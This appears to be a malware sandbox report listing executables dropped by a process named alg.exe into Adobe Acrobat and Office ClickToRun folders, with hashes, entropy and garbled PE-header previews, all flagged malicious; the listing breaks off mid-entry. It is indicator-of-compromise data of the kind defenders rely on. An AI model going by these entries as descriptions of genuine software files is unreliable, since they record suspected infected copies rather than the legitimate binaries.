                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@...........................!.....................................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc.......@......................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1298944
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.525825875063929
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:qiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:s/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:3E4031479F673025705F980C5DD9F3D8
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:7192F1FF8F2FCFF818445A9B9900E19AAFCFE2BE
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:8A8DFB04BD2ADFC85286BAB214AA037DE65DA100F9B4FCE3D8051048EC17D655
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:BBCEE3A4248017A1B64F60B88FD8897B38637EAF7375236953B7CF187C19F7C67259689D1801EFA9414CFB82455DC90915C2F372FF8543E6E78A72A39A5A60C8
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@....................................7c.... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...`...........2..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1317376
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.555420510983085
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:2JiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:y/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:274DDCE1829DB23C4D64A8810C5941CB
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:C3BD3A5C03C4A2765A439DB19D6F7E46D340C8EF
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:F82F5B4011E36C8392AA43310450579B336FAACD80824636256254B786FF4149
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:FB0227D05CFDE9968DA83A73DD534505F7C75D9921AFD63B19A1101E4F544F723B1F9D00F29B75969662042663817853E092640E4FA02097B6492B60A89BA212
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.......................................... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...`...........z..............@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.497765617649596
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:2tuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN7554LNiXico:2jEIa4HIEWOc5G7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:3AC72B66223ED56AD2D6CDEDDE066F6D
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:37E917C8E203F4D89DD79333FD7C16655C99C4C3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:753A020E70A1EEB12F88897C1C72F7580EA89EDBDA280B3D7B4464E06B9F1518
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:6D28AAE84991CE0BDE7442F90FBFCCBDBF960CC8EE6EDCB623CDD5F75EFEA20B0F00C6F60CF217069680A3CC3274663D65ECE557B0B2A054A8CF39112873EA6D
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.....Z.?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999360394541404
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:1572864:9Qb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:2XhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:9AEBD32321C41E2F3FE9AF0B315E93D5
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:F13BA1B646BD39E1D0B736E84A96968737A78398
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:56FA9ED63CF4D40BF4E54AEDE3995F59162BE5A79A6C50B0FEE2B8ED11FB23CE
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:6C09DF6B3836C122B2144B2995452788A45EF61C16A30A999625962037317760D6CE66E19DD5155F35836A14A7E92667915BEDA3A9542DF1695EC288506DD625
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0............ .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1385984
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.70880989819714
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:1jkYz9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:9/z9LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:67496FDEB1D3C5E27FA51D1737FE7329
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:126E307A354650EAF22C7EB00BA2C235BBEDC581
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:EF06E54C755308F12D5E41EBB6974A14EAA455DD84223FE84C824E5BEE288466
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:43BA25A09972F90438AD9E723E9243BDC0340099D74E7262891C61E2B1010ED7284E86B170883FF9B24906A09BBE0ED638E294C91842AE70A7948F1B9B28F32F
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@.......................... .....g........................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...p...........v..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1540608
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.93863340586214
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:exwSJikrmZsJ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:eylkrKsJLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:7D832709D2BA5488C956B9EA7393820B
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:61269781C1F8B98C33471B6316E8B2FDEF9216B0
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:A06EE229D3C5506FBE491F46EA334111AFB632A7297BD9123DF99DFED96162A5
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:A688E71092AB4EBD18B346A6B7A35E669982D7FF46F86BC488E61FC6641A016E6B7786BE1754348BEDD55903E62C1EF24BF0BA3409508DDF96EBA49A97D2DA82
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@..............................".....\w.... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...`...0......................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1804800
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.2504195085694985
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:PHQJLIRIvsnN8/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:PHQJLP48LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:66B3BA8DD8BAB8BA6B21AC9D5AED3409
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:A631BCEE9EACCA0FCB5EED971E0BF4CA24E086E1
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:BA1D97AA979894DFF8AF8FD454EE1A5EE6843B00990D5E83DF6BA791F4DBE0A3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:C42407B40A6829A582C3BFC48EE4A01A2596CBC2551390C80201A201FF7A952DAD0F7E3D6C2D24AABDF2EC8BB67D40791E63F0E03002AC287B4735B7352F9895
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@..............................&.......... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...`...@......................@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):5365760
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.448966181724942
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:tUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1kS:KWmXL6DEC7dRpKuDQbgf7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:E375770576784898F172D9D60C683198
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:AE8B9DF6F4ADAA42615D6A459721A114D6278B2F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:D7CAEBF521217EA1CC46033A8A7935B0D176419A59E5670C23AB1232FC20511F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:A48F61251F536353D54CA06266A658B74841030E2BB9B43613D1A5EF1A0EFD80FA91CF0B6B5D6F7F7619E5A3F1593C9C582B86D75D2DF25BFE759920E5A93F5C
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.......R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):3163136
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.971965142657942
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:brZ23AbsK6Ro022JjL2WEiVqJZY7wRGpj3:/JADmmxL2WEoCZEF9
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:D42F3201E43699D6DDD4EEFF737A821E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:B4A49089548CD9452C651FF12C05B61DCDD57141
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:AC770DC461369936C647A41468AE57A01835229835ED5A583925CCC5887CE457
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:62048E2616C12C6DF10A11686EA963A4C765E3248B0B44087D1C715FD90AE711262770E53EB70D2137C67827CDA43F46D9CF39BE3BA75AA020E97C13EE1D5F9E
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1.......0.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1213440
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.197657696809315
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:EfrYY42wd7hlOw9fpkEE645/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:5z9xrS5LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:F03ED49D780ECDAA818B9B92688EC935
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:94B2D07F1B820EEADF52B220A01A9D4868E0874D
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:4A1BF388F83223F40A4B1B39A33B2A31B4B02828F3749CEA2DDBFB22497F4760
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:473FE179F672E2D49A349F0F99EA73310EDBDE70C4A32E9F3B19A51816C4EE0E14BCC292847B7A843B7D4E131D868906F6F2D055EF189102DAD846B2E6E7B578
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ............ ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1544192
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.839830544538881
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:yzNKUc5G/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:yzNrc5GLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:C2CFA0C01D5B6CD9670488AB08B87E23
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:4611B4D9FA6BADBADECBCD4653D1BB6C3F11EFC9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:C1C8EFB7C4CA5A576DECA87FDFE2D5D31B04B3F3F967192D5FD3896F15CBECE9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:B86EB306C04C4437E5C1AC1376B3710090804B92377553ECD73651BEFA4DAB4FC01687C501430505820CEDF2145055EEAB9FC8D67FB41C79A22B0DF53DE26890
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................`"........... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):5855744
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.572805229111452
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:TALuzDKnxCp3JKNrPJzruaI6HMaJTtGbr7wRGpj3:EaGg3cFPIaI6HMaJTtGbPF9
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:27D118A9FB31DE745BCAE88165F4ECE7
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:F1F5D3750AABA184EE292C5B4DD8E592E19D6171
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:8BDFC163BD1C5BBDD4EC86B62850A2213D564342B1935B584DFF5214619CD3D2
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:B4B60C0B4E479756E44A6B44485E58E67D103828471C9883D33E2FD4CB241DE35A639FA3FB6C304A5D6790A24E53FDA8384FFD2125472CF861279C3A7C55D855
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y......VZ... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1468416
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.895093306283645
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:fXr/SV0xWV/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:DNxYLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:311BD86CCAEA70727DB7E4D9475A1154
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:30E7E6948EB6C61C6B1E069122E3DE20A527A398
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:C1EC2AD1C65CD542FE1CA96317784BDCD7D6518096A4661A3014ED8119E6E9D5
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:543E3A1E743140A192E3FED9FEF37BD3496771EE4F662E193F572A898DC20C439764375BE5707692634C7C6258AE66AC29A47916028A64DA66BFBCB6379304C0
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................`!.....[............ ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):27533312
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.24820618603424
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:196608:bhRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOzF9:bhRCpGpMJMrbp8JjpNdNlc5+9
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:430C9B4AB54F2570B4182F56F9FFDBB6
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:5BA011CAD0FCAEC1E3280C6AEB530139DE68A9A1
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:652883FDBC8EE2D2C8715AC4CA15B038FAAD6E1511C474C2BF6C2F4E0A7EBCC0
